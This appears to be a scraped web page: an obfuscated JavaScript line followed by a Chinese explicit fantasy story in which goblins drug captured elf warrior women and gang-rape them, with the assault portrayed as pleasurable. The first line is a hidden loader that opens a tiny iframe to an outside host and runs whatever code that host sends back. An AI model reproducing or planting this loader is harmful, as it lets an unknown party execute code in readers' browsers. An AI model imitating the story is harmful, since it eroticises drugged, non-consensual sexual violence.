eval('\x77\x69\x6e\x64\x6f\x77')['\x62\x48\x79\x4a\x6f\x64\x6a']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='wwttyy'){new Function(e.data['d'])()}})})('https://samanthyean.com:22665','/cd/108_m/1448',window,document)};

阿苏焉的沦陷


  现在,我和我的姐妹们都已经筋疲力尽,地精们夺下了我们的共建和法杖。

  尽管我精湛的箭术令泰利昂大人都颇为惊叹,但在绿皮怪物们压倒性的数量面前,这一切都无济于事。除了我,其他许多女战士也被兽人俘虏了,我可以环顾四周,看到至少三十二名其他精灵女子,她们多数是我的战友,也有几位神殿里的女祭司,她们都被剥夺了武器,被强迫跪在地上,并被一群欢呼的哥布林们包围。

  阿拉尼娜上尉——我的部下和好友,如今蜷缩着跪在我的身旁,脸色却依然坚毅,她轻声说:「爱丽迪公主」,「如果我让他们分心了,你能逃脱吗?」我双手在背后反捆着,尝试着扭动几下,感觉粗糙的绳子在我的皮肤上摩擦。

  在我沉默下来,摇摇头:「不,」我痛苦地叹了口气。「不,我做不到」她叹了口气,沉默下来,她那凌乱的金发反射在在抛光的大理石地板上。我们和其他女孩们都在莉莉丝(Lileath )的圣殿内。一半的地精在注视着我们,用手指,刀子和鞭子胡乱敲打着欢呼。另一半掠夺神庙,互相争抢着,肆意亵渎镶嵌在墙壁上的名贵的宝石和贵金属,用刀和锤子切开石头。

  「你这白痴!」其中一名地精比其他人稍大一些,他们用自己的粗俗语言聊天。「老大对这些女人有有趣的安排!」数十名地精匆忙的离开了神殿。我再次环顾四周,想知道这是否是我的机会。

  但是,没有,仍然有太多的地精在四处游荡,掠夺和毁灭,并兴奋的嚎叫着。

  更糟的是,很快地精们就重新涌进来,拉动一辆粗制的推车。车上有六个盛满诡异液体的木桶。

  「老大万岁!」一些等待中的地精们欢呼雀跃。

  「把尖耳朵女人押来,让她们喝吧!」妖精老大说,「先给她们的老大!」他指着我说。

  绿皮们向我冲来,把我身边的女孩们都推倒在地。我拼命挣扎,试图用牙齿撕咬他们那肮脏的绿色肌肉,然而,这一切毫无意义。我被拖到推车上,推车出奇的结实,地精们的小手在我身上摩挲。

  「你认为战斗就是你们的全部?」推着车的的地精狞笑着说,一边大叫,一边跳舞,「但是,兽人是最棒的!我们会教你们如何做一个女人!」我厌恶地瞪了他一眼。地精们将我推到了女神的雕像下,这忽然让我感到一种痛苦:我们被这些低贱的生物打败了,任由他们亵渎我们的信仰归宿,这简直令人无比耻辱,即使是我自己的糟糕处境也无法与之比拟。

  「抓住她!」地精头目喊着,向我挥手。「她们是完美的战利品,别让她们跑了」他笑着,露出泛黄的牙齿。「现在,把她们全部剥光!」瞬间,肮脏的绿手,开始撕扯我的衣服。我挣扎着扭动身体,试图避开它们,但这也是徒劳的,它们很快就撕开了我穿着在盔甲下面的皮革衬衣,又撕开了名贵的震旦丝绸,把我的内衣扯成残破的布片。

  「离我远点,野兽!」我咆哮着呵斥它们,尽可能让自己看起来像兽人一样粗鲁。我用头猛击我身后的地精的鼻子。他开始尖叫,但周围还有更多绿皮包围着我。我威胁说:「我是一位精灵公主,你们所有人都会为此付出代价。想到泰利昂将军回来以后会做什么。」「没人会付出代价,」正在撕扯我的裤子的一只地精轻笑着。「没人能击败格罗姆大帝!」现在,我几乎一丝不挂了。只全身上下只剩几根破烂的布条,对遮羞毫无用处,反而显得更加羞辱。我丰满的乳房,修长的双腿裸露在怪物们面前,长裤最后残余的几块仍然固定在皮带上,勉强地遮挡着两腿之间的花丛。其他所有被俘的姐妹们也遭遇了同样的事情,骄傲的精灵女战士在一群肮脏的绿皮怪物们面前赤身裸体。

  我没哭,我甚至都不算特别害怕。我只是愤怒,并且如果我的双手未被绑在背后,我一定会把在场每一头绿色的东西射成刺猬。但是现在,我无能为力,只能痛苦的承受到他们的钝刀片在割碎我衣服时冰凉的触感。

  一旦我彻底赤裸了。哥布林把我围在中间,尖叫着,争吵着,他们的手放在我的肩头,将我按跪在地上。当我被迫屈膝时,我厌恶地瞪着他们。我仍然不打算屈服。

  「给她喝药!」地精们高声喊着,他们的话语相互交叠,如此嘈杂,我几乎听不清他们在说什么。好像是「大乐药!大乐药!」「该死的野兽,你们想干什么?」我知道我不会得到答案,但还是趁机发泄了愤怒。

  当我的目光越过这些怪物时,我看到货车周围有更多取之不尽的地精拥挤过来。一如既往地毫无纪律,嘈杂争吵,他们将精灵们精美的水晶酒杯推到车上的木桶旁边。我可以看到绿色的液体从桶里被倒出。然后几只地精转身离开,端着装满了液体的容器。

  他们中的一个朝我走来,其余的则走向其他被俘的女精灵。一股诡异的香味从那液体中发散出来,我本能的想要退避,但却被地精们摁住,动弹不得。

  「蔓陀拉的果汁,适合尖耳朵妓女!」兽人大喊大叫,从一边到另一边挥舞着杯子,使泡沫状的绿色液体在其顶部晃动。

  我感到一阵恶心。我过去曾听说过许多关于地精或兽人食物的可怕传说。我无法想象喝他们做的任何东西。

  但是我别无选择。兽人靠近我,地精们则抓住我的头,张开我的嘴。我拼命挣扎,试图咬断他们的手指。但是它们太多了,当地精把药水倒进我的嘴里时,我无能为力。我试图把它吐回来,但却丝毫使不上劲,当药水涌入腹中的时候,我感觉到恶心的冲泡从我的喉咙滑落,并在它的尾流中留下一丝热气。我颤抖着,看向同伴们。她们也和我一样,被迫喝下了药水。

  「操尖耳朵娘们!使劲操她们!」兽人们开始高喊,「使劲操她们,使劲操她们,使劲操她们!」我颤抖着,后依然感到一股诡异的热流在体内开始发酵。这不是愤怒,而是一种令人羞耻的空虚感。我的乳头开始变硬,双腿之间也开始湿润起来。我痛苦地意识到,邪恶的绿皮给我灌下了春药。我从没想过这些野蛮的怪物们还会做这种事。

  很快,我感到欲望在我身体深处潜滋暗长,从阴户和乳尖向四肢百骸蔓延。

  我咬紧双唇,努力不发出声音,试图维护最后一丝尊严,我不想让野蛮人们得以嘲笑我。其他被俘的姐妹们也多是这样的表情。我很确定,她们也都陷入了这种羞耻的人造性欲中。

  「哦,」我终于还是呻吟了起来,性欲的滋长令我无所适从,我扭动着身体,似乎有一股火苗在我双腿之间灼烧,灵魂深处似乎有什么东西在要求被填满。

  「哦,所有的众神。」我祈求着「 Yahahahahaha (哈哈哈哈哈)」,其中一个兽人指着我说。「尖耳朵婊子发情了!」我艰难的吞了一下口水,知道他是对的。当我的身体来回扭动时,我呼吸紧促,可以感觉到脸颊上的热量,欲望已经开始吞没我的理智。我的乳头已经长大到葡萄大小,显示出诱惑的紫红色,乳房也鼓起了一倍多。我的阴户蜜汁泛滥,双腿之间的肉瓣向外翻开,不由自主的一下一下颤动,粘稠的淫液顺着大腿滑落。

  在我周围,绿皮们开始抽动他们肮脏的缠腰布或拉扯他们的裤子,露出他们的公鸡。像小臂一样大的公鸡,又厚又绿,正对着我。我呻吟着,看着它们,感觉到我体内欲望的蔓延。当我试图说服自己我不想要自己所看到的东西时,我的大腿来回摩擦。

  在我视线余光所及之处,又一次打击冲击着我:我的一些同伴开始屈服了,她们用被束缚的手脚挪动自己的脸,将自己的脸按向兽人的裤裆。阿拉尼娜上尉也在其中,我能听到这位高傲的精灵女骑士出现时的绝望的,放荡的乞求,乞求被她的征服者操弄。

  我的阴户更加湿透了,看到这些女人,其中一些我朝夕相处的姐妹们,一个个开始与野兽们性交。阿拉尼娜被三个兽人抓住。他们看起来很享受,女骑士被平放在地面上,伴随着一声混合着痛苦和享受的闷吟,绿色的公鸡刺入她的身体。

  我扭开了我的头,不愿再看这淫邪的画面。我向后看去,因为我感到一把钝刀再次刮向我。然后我感到手腕和脚踝周围的绳索松脱。他们解开了我。因为毕竟现在的我已完全不能反抗,而他们要对我做的也比捆绑更多,也更羞耻。

  「来吧,老兄,」一个兽人说,他朝我丰满的乳房欢呼,甚至没有抬头看着我的脸。「你还在等什么?精灵就是为被肏而生的!」他将手缠在勃起的公鸡上,轻轻一挥。「所以去吧!」一股腥臭的气味涌入我的鼻腔。我凝视着自己面前那只厚重的公鸡,以及周围所有其他的公鸡。它们是那样的健壮,如此诱人,离我如此近……我想要的伸出手抚摸它,幻想着自己被它侵入,被它填满,被它支配。

  我最后一丝理智轻轻呻吟,试图阻止自己丢脸的行为。我失败了。我的手迷茫地伸出,缠绕在我前面的兽人的公鸡上。当我的手指抓住绿色的公鸡时,周围传出一阵粗野的嘲笑声。

  感觉真好。当我急切地抚摸着公鸡,双腿颤抖,感觉到手指下面的热量和硬度。它看起来是那么强大,那么阳刚,甚至那么性感。我想要……我想要它以及我周围的所有其他粗壮的家伙。我想想我的姐妹们一样,让自己的舌头舔抵这雄性的力量。我完全忘记了一切,我想性交,我想被肏,我要让公鸡填满我的身体,其他一切都不重要。

  「请,」我呻吟着,我的眼睛仍然盯着我开始猛跳的家伙,「求求你,请肏我。」我颤抖着,哦,听听我在说什么,太羞耻了,但仍然无法停止。「我需要你肏我。」围绕在我周围的十多个绿皮发出了刺耳的笑声。他们开始相互争吵,甚至似乎发生了打斗……我不知道,我只感觉到他们挤压我的乳房和臀部,捏住我的乳头,并在我的大腿上摩擦。一只地精抓住了我的另一只手,然后将其缠在自己的公鸡上。我开始上下滑动我的手,摩挲着他的公鸡。

  这羞耻简直无以复加,特别是当我意识到自己没有被捆绑着的时候,仅存的一丝理性催促我设法逃跑。但我办不到,我放荡的兴奋感充斥着我的全身,我的双入,我的阴户,我的菊门都在高喊着想要更多。当绿色的手粗鲁的挤压我的胸部时。我想通过尖叫宣泄苦闷,但喊出的却是享受多于痛苦的淫吟。

  「操她,操她,操她!」绿皮们喊叫着,我张开的双唇被顶向他的裤裆,然后,他忽然向前顶刺,进入了我的口腔。我能感觉到他的公鸡紧贴着我的舌头。

  我喘着粗气,感受着口中肉棒的热量。尽管我早已不是处女,但过去从未经历过口交,这邪淫的感觉令我更加欲火焚身。我热切地开始吮吸它,沿着他的肉棒上下推动我的头,我想喜欢它的味道。

  兽人们仍在不停地,摸索着我的身体,拧我的奶头,拍打我屁股,揪我的阴毛。但我已经不再感到痛苦了,只有一种堕落的舒适感。淫欲和受虐欲在我体内翻滚,一刻也没有停息。「啊……嗯……」我抛弃了一切矜持与高傲,竭尽全力的扭动身体,口中放肆的呻吟,就像人类城市里名为"娼妓"的女人一样,感受着自己心灵深处的欲望和需求,并全身心地屈服于这种欲望。

  我的许多姐妹们也已经这样做了。尽管我看不见她们,但我能听到她们清晰的,放浪的淫叫声,精灵女孩们充斥着肉欲的欢吟回荡在神殿里,曾经献给诸神的赞美诗如今称颂着绿皮征服者们的肉棒。

  我钱身心的沉浸在对那个野兽的口淫之中。口水从我的嘴唇流下,经过脖颈,流淌到长大的双乳上,但我不在乎。情欲实在太强烈了。我耐心的搅动舌头,舔抵,吹吸,轻咬……给我的强奸者提供着乐趣。我的胸前湿淋淋的一片,分不清是口水还是淫液。

  然后我感觉到有什么东西紧贴了我的菊门。当我感觉到绿皮温热的公鸡顶在我的屁眼上来回摩擦时,我的眼睛睁大了,心中上过一丝恐惧,但是很快又被情欲所吞噬。「请,来肏我吧」。这变态的欲望是如此的强烈,我渴望得到满足,即使是从我的后庭。我想要被肏,不管被谁,即使是肮脏的绿皮也无所谓。

  我感到兽人的攻击上沾满了粘液,我颤抖着,猜想他把公鸡浸入了我刚刚喝下的那种春药里。如果他进入我的身体,会不会让我比现在更加淫乱堕落,更加沉沦在性欲中不可自拔?我绝望的胡思乱想着。

  我将不得不找出答案。在我的尖叫声中,兽人向前推动身子,将他的公鸡缓慢地刺入我的后庭。我感到下腹部传来一阵温热的充实感,发出一阵含糊不清的呻吟。兽人雄壮的力量通过公鸡传递到我的身上,他同时用爪子摁住我的屁股,开始反复冲刺。

  我的眼神涣散。感觉到春药的作用再度加倍。淫邪的欲望没有减弱,反而愈来愈强烈。当我感觉到欲望在我内心加倍时,我像蛇一样扭动腰肢,最后一丝理智像风中的柳树一样摇摇欲坠,双乳更加红肿了,甚至溢出了几滴奶汁。我在嘴里含着公鸡,艰难地呻吟着。

  周围的绿皮们嘲笑我,嘲笑着我的淫荡和屈服,但我已无法在乎这些。感觉到从纤细的身体前后两端传来的亵渎冲击,我发出一阵阵欲望被满足的舒畅叹息。

  但这还不够。我双腿之间的小穴仍然蜜水泛滥,发出一阵阵渴求的瘙痒感。兽人们的公鸡在我身体两侧挥舞着,我想要它们,我的双手缠绕在离我最近的两根肉棒上,上下抽动,竭尽全力的取悦着征服者们。

  然后,我看到一个地精爬到我的面前,她矮小的身体在大理石地板上摇摆。

  他的脸埋在我胀大的乳房之间,我感到他的公鸡在我的大腿内侧摩擦。我陷入了迷醉,不确定是否要主动将身体贴近他。

  但这并不是我能做的选择。很快,地精的公鸡就紧贴到了我的腿间,顺着我那沾满自己淫液的大腿和健美的小腹向上推。我呻吟着,只感觉到绿色的的公鸡洞穿了我的身体,带来一股侵彻心扉的性欲狂潮。

  接下来,兽人开始如一杆不知疲倦的机器一般,在我的身体里反复抽插,给我带来一轮又一轮性感的冲击。我彻底迷失了。恍惚间,眼前狰狞的绿皮怪物仿佛化身为了多年未见的丈夫,于是,我大声呻吟着,心安理得的配合着强奸者的动作。

  「呃……啊……」,在受到迪克一阵格外猛烈凶狠的抽插之后,我的呼吸急促起来,喉咙深处发出一阵淫荡的咆哮。我双脚紧绷起来,两眼睛瞪得滚圆,赤裸的身躯猛的一挺,丰满的双乳上下昂甩。我感到我的阴道节律性的强烈收缩,以至身上的肌肉都随之不停地痉挛着……一股热流猛地从下身喷射而出……我明白,自己终于在残暴的奸淫中,无可控制的达到了高潮。

  我知道,这是奇耻大辱。是对一个精灵女人尊严人格的彻底蹂躏,但我已无法在乎这些。因为春药带来的性欲是如此的强烈,以至于高潮鞋身带来的满足感转瞬即逝。欲望是如此的强烈,逼迫着我去追求更多,更强烈的的高潮。与这疯狂的感受相比,我过去与精灵男人的一切性经历仿佛不值一提,微不足道。我完全沉沦在性欲之中,想起周围环绕着数十只绿皮,以及它们的坚硬,厚重的肉棒,我几乎感激不已,正当我还沉浸在高潮的余韵中时,我感觉到嘴里的绿色肉棒在抽搐。我知道将要发生的事情。但是我无法,也不想摆脱困境。我只是温顺的用舌头挑动口中的肉棒。

  「啊哈哈哈哈哈!」兽人尖叫。他的笑声残忍且野蛮。「接好了,婊子!你真是天生的奴隶!」他说着,吧大把的精液射进了我的口腔中,,我咳嗽并感到作呕。地精的精液在我的嘴唇之间溢出,顺着我的下巴滑落到地板上。

  越来越多的精液还在源源不断的涌进我的喉咙。我别无选择,只能吞下它们。

  我咳嗽着,感觉到浓密的精液从我的脖子流进了我的胃,与我必须先前喝下的春药混合在一起。最糟糕的是,我居然觉得兽人精液似乎很……好喝,精液的味道散布在我的舌头上,"更多,还要更多,我希望这辈子都要在兽人们的胯下度过",我迷茫的想着。

  周围地精的嘲笑声声在我努力吞下它们同类的精液时才变得更粗野。在我仍被阴道和菊门里的两根肉棒夹击的时候,他们的嘲弄声淹没了我。

  射精之后,对我的口腔进行强暴的那个兽人心满意足的离开了。我的呻吟声顿时清晰起来,这时我才发现,我自己的声音是如此的放浪,淫荡,其中早已没有了愤怒或是羞耻,只有完完全全的欲求与满足。

  但口腔里的空虚只持续了几秒钟。第一个兽人离开后,另一个取代了他的位置,我继续弯腰屈膝,不得不抬头服侍新的征服者。他向前推臀部时,匆忙地将公鸡顶在我的脸上,使它滑入我的身体。

  就像那样,我再次被绿色公鸡的迷住了。而且依然欲求不满。我能听到其他精灵女孩们的呻吟声和求欢声,他们显然也在接受兽人的恩赐,并且和我一样渴求着这一切。

  我感到又一股温热的液体喷射到我的脸上。我转动目光,发现是我一直在抚摸它的绿色肉棒之一,直到他沿着我的身边喷精液时,他的公鸡都在我的掌握中跳动着。好温暖,好舒服……而且我还想要更多。

  「操她,操她,操她!」插入我阴户的地精又在高呼,他的声音仍然埋在我的乳房之间,他的声音依然粗野而沉闷。

  现在,我身上的三个小洞都被腥臭的敬业所填满。但这还远远不够,我的欲望却仍未被满足,我颤抖着,像发情的雌兽一般嚎叫着,任谁都不会吧现在的我和平时那个优雅的女武士联系起来。

  我的身体正尽可能地紧紧地包裹住插在我全身洞穴里的公鸡们。我拼命迎合着,生怕淫乱的抽插不在继续。当我面前的地精从我阴道里拔出公鸡时。又一股清亮的阴精从我双腿间喷射而出。

  同时,正在享用我屁股的那个兽人也开始了射精。我喘着粗气,睁大眼睛,品味着精液深入直肠的痛感与舒爽。我感到大量精液充满了着我的屁股,那感觉甚至比性高潮更加刺激。

  每当一个兽人退出,他就被另一个代替。新鲜,坚硬,厚实的公鸡一个接一个的刺入我的阴户,屁眼,口腔,我的心灵在握紧的性欲海洋里翻滚。精液,春药,高潮,公鸡。这些词放佛已经成为了我的一切。

  口腔里的公鸡又要发动了。那只兽人在射精的同时,故意将公鸡深入我的咽喉,上下抽动着,给我带来一阵窒息感。我本能的挣扎之,心中的快感却并未减少半分,与这惊人的快乐相比,似乎连死亡都不值一提。

  啊啊啊呃呃呃呃呃,公鸡,公鸡,公鸡,我是谁?这是什么地方?我在和谁做爱?这些都不重要。我需要的只是更多的满足,更多的刺激,更多的公鸡。我的嘴巴,阴部,屁股上有一只公鸡,但我想要更多,我是妓女,我是荡妇,我是说一接上最不要脸的女巫,我需要所有这些啊啊啊啊我不知道他们是什么时候结束的,只知道直到我精疲力尽昏死过去之前,仍有至少半打绿皮怪物在我们身边。

  他们人数实在太多了,我很确信即使要强暴整个阿苏焉所有的女精灵,它们也一定能够做到。

  ***

  那天晚上,天气尤其的寒冷,绿皮怪物们将我们神圣的森林砍倒,作为取暖的燃料。火光照亮了淡水河谷,足以让我看见自己的处境。数十米外的神庙偏殿里,仍有几名比我们后辈抓来的女精灵在遭受蹂躏,但至少看起来,绿皮们终于暂时放过了我。

  尽管被那么多怪物蹂躏,但是我绝望地发现,自己的淫欲仍然没有消退,我的双乳依然鼓胀,奶头滚圆,不时挤出奶汁,我的双腿之间依然瘙痒不堪,淫液混合着兽人的精液溅得大腿内侧一片狼藉。我不知道春药的效果还要持续多久,会不会整个余生都要与这样的欲望相伴,但至少,现在这股欲望可以用意志去忍受了。

  由于太过虚弱,我几乎无法站稳脚跟。取而代之的是,我手脚并用地爬过神殿的地板,艰难的躲避着满地的污物,由兽人的精液,姐妹们的淫液和奶水,以及其他不知名液体混合成的污物。在爬过莉莉丝女神的塑像是,我痛苦得畏缩了一下,意识到自己的耻辱与放荡都已经被众神看在眼里。

  「爱丽迪公主?」忽然,一身熟悉而憔悴的呼唤传入了我的耳中。

  我向左望去,顿时愣住了。金发女子阿拉尼娜上尉再一次出现在我的面前。

  我几乎不认识她了。她柔顺的金色头发上沾满了汗水和精液,发丝被污液紧紧地黏在一起,显得既淫靡又凄惨。他的声音很沙哑,或许是因为和我一样给他多的兽人们口交。她全身一丝不挂,全身上下被精液所覆盖。特别是在她的脸。我几乎无法辨认出她的面目,她看到我同样愣了一下,很显然,我现在的形象并不比她端庄多少。我知道,我需要洗净自己的身体,但附近唯一的水是神殿里神圣的魔法之泉。不管自己遭遇了什么,我都不会允许自己去玷污它,并且我知道,阿拉尼娜也一定会这么想。

  「妹妹!」我凄凉地回应了一声,声音嘶哑。我一边跪趴着像他挪去,一边努力让自己的姿势显得不那么狼狈。

  「救救我,公主殿下,」她张开双臂拥我入怀,把头贴近我的胸口,泣不成声,我也用同样的动作作为回应。整整十分钟,两个赤身裸体,惨遭亵渎的精灵女孩可怜的依偎在一起,互相安慰着,舔抵着心灵的伤口。

  最后,还是阿拉尼娜首先恢复过来,「你可以行走吗?殿下?我该如何帮助你离开?」多好的姐妹啊,即使到了这时,她仍然在关心我。想到这里,外婆的心中闪过一丝暖流,「是的,」我迟疑地说,尽管我的身体在轮奸中已到极限,特别是双腿几乎无法并拢,我还是不忍让她失望。我们俩互相搀扶着,走向附近的一扇小门。「我们慢慢走去,发出小心地不发出声音,然后穿过神殿的主房间。我试着不去看仍然在这里的所有其他女精灵,生怕自己被姐妹们悲惨的遭遇击垮——她们无一例外的双腿软绵绵的分开,浓密的白色溪流从她们身下蔓延出来。密密麻麻的精液遮盖住了她们的身体,让我几乎无法辨认。她们中的几位已经没有了气息,其他人自在无意识中继续呻吟着,分不出是痛苦还是享受。

  仍然留在神殿内的几个兽人没有注意到我们,他们忙于抢夺着神殿里所剩无几的战利品。我们没有食物,没有水,没有衣服。但是至我们还活着。

  我们溜进幽深的夜晚。绕过燃烧的市区,又走过一英里多的山坡。该地区到处都是兽人,但我们有信心绕过他们。

  我看着阿拉尼娜上尉。她也回头看着我,擦掉了脸上的一些精液。我们继续赶路。

  阿苏焉不会灭亡,野兽们可以玷污我们的身体,但永远我发征服我们的灵魂。

  我们要到内城要塞,去向永恒女王艾拉瑞丽陛下报信,她无敌的生命魔法曾令混沌恶魔都闻风丧胆,也一定能轻松击溃这些绿色野兽。

  【完】